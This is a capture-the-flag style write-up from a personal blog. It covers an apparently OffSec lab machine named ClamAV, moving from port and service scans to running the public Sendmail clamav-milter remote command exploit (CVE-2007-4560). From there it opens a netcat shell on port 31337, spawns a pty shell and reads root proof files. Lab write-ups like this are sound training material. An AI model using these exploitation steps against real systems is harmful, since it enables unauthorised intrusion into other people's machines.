22 Mar, 2024

#reconnaissance #open ports #potential exploi

Clam AV

Reconnaissance was conducted on the target IP address and identified open ports and services. A potential exploit for Sendmail with clamav-milter was discovered. Further investigation is required to determine if the exploit can be successfully executed.

Preston Zen

prestonzen.com

Target:

192.168.181.42

Prep

Open Resources

General Mind Map:
https://xmind.app/m/QsNUEz/

Confirm docker is installed and set rustscan as an alias or add to bashrc / fish config due to it being able to scan all ports and services in 10 seconds

alias rustscan='sudo docker run -it --rm --name rustscan rustscan/rustscan:2.1.1 -a'

Create directory for target and enter it

mkdir ClamAV
cd ClamAV

Prep a nc listener

nc -nlvp 4444

Confirm ip address

hostname -I

Recon

Start with a quick open port scan

rustscan 192.168.181.42

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack
25/tcp    open  smtp         syn-ack
80/tcp    open  http         syn-ack
139/tcp   open  netbios-ssn  syn-ack
199/tcp   open  smux         syn-ack
445/tcp   open  microsoft-ds syn-ack
60000/tcp open  unknown      syn-ack

Quick OS check

sudo nmap -O --top-ports 1000 -v -T4 192.168.181.42 -oN osType.nmap

No exact OS matches for host

Follow up with a service scan on those open ports

sudo nmap -sC -sV -p22,25,80,139,199,445,60000 -v -T5 192.168.181.42 -oN services.nmap

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
|_  1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.241], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp   open  smux        Linux SNMP multiplexer
445/tcp   open  netbios-ssn Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey: 
|   1024 303ea4135f9a32c08e46eb26b35eee6d (DSA)
|_  1024 afa2493ed8f226124aa0b5ee6276b018 (RSA)
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h29m59s, deviation: 3h32m08s, median: 4h59m58s
| nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   0XBABE<00>           Flags: <unique><active>
|   0XBABE<03>           Flags: <unique><active>
|   0XBABE<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.14a-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-11-10T05:43:59-05:00

Port 22 - ssh

Port 25 smtp - Path2Root

25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
	| smtp-commands: localhost.localdomain Hello [192.168.45.241], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
	|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 [email protected]. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info

searchsploit sendmail

Sendmail with clamav-milter < 0.91.2 - Remote Command Execution

RCE Exploit with both Sendmail and ClamAV in the name so worth a shot

searchsploit -p 4761

  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761
     Path: /snap/searchsploit/387/opt/exploitdb/exploits/multiple/remote/4761.pl
    Codes: CVE-2007-4560
 Verified: True
File Type: <missing file package>

Check exploit
![[Pasted image 20231110012951.png]]
Exploit also called "Black-hole"
Seems to open up a port on 31337

Run exploit and confirm

perl 4761.pl 192.168.181.42

![[Pasted image 20231110013503.png]]
Elite service open on port 31337

Connect to it and check for data responses

nc 192.168.181.42 31337

Check Privileges
![[Pasted image 20231110013701.png]]

Upgrade the shell for something more stable

python3 -c 'import pty; pty.spawn("/bin/bash")'

Actions On Objectives

For non-privileged access proof dump

echo " "; echo "local:"; find / -type f -name "local.txt" 2>/dev/null | xargs cat 2>/dev/null;

Dump all local, user, network, and proof info.

echo " "; echo "uname -a:"; uname -a; \
echo " "; echo "hostname:"; hostname; \
echo " "; echo "id"; id; \
echo " "; echo "ifconfig:"; /sbin/ifconfig -a; \
echo " "; echo "proof:"; cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null; echo " "

![[Pasted image 20231110014243.png]]Submit hash(s)
780234ccfae35670fe766a167822f528

Port 80 http - Not Vuln

nmap --script "http-*" -p 80 -T5 192.168.181.42

80/tcp    open  http        Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
|_http-title: Ph33r
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE

Kernel Exploits

searchsploit 1.3.33

Exploit Title    |  Path
Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation    | linux/local/3384.c
Shellcodes: No Results

Target URL:

http://192.168.181.42

![[Pasted image 20231110010906.png]]
Binary to text: `ifyoudontpwnmeuran0

DEL

Clam AV

Prep

Open Resources

Recon

Port 22 - ssh

Port 25 smtp - Path2Root

Actions On Objectives

Port 80 http - Not Vuln

Offsec - ICMP - Nov 4th 2023

Offsec - Sumo - Jun 15th 2023

Offsec - Levram - Nov 1st 2023

Offsec - Codo - Oct 31st 2023

Offsec - Slort - Apr 22nd 2023

TryHackMe - Blue - Oct 29th 2023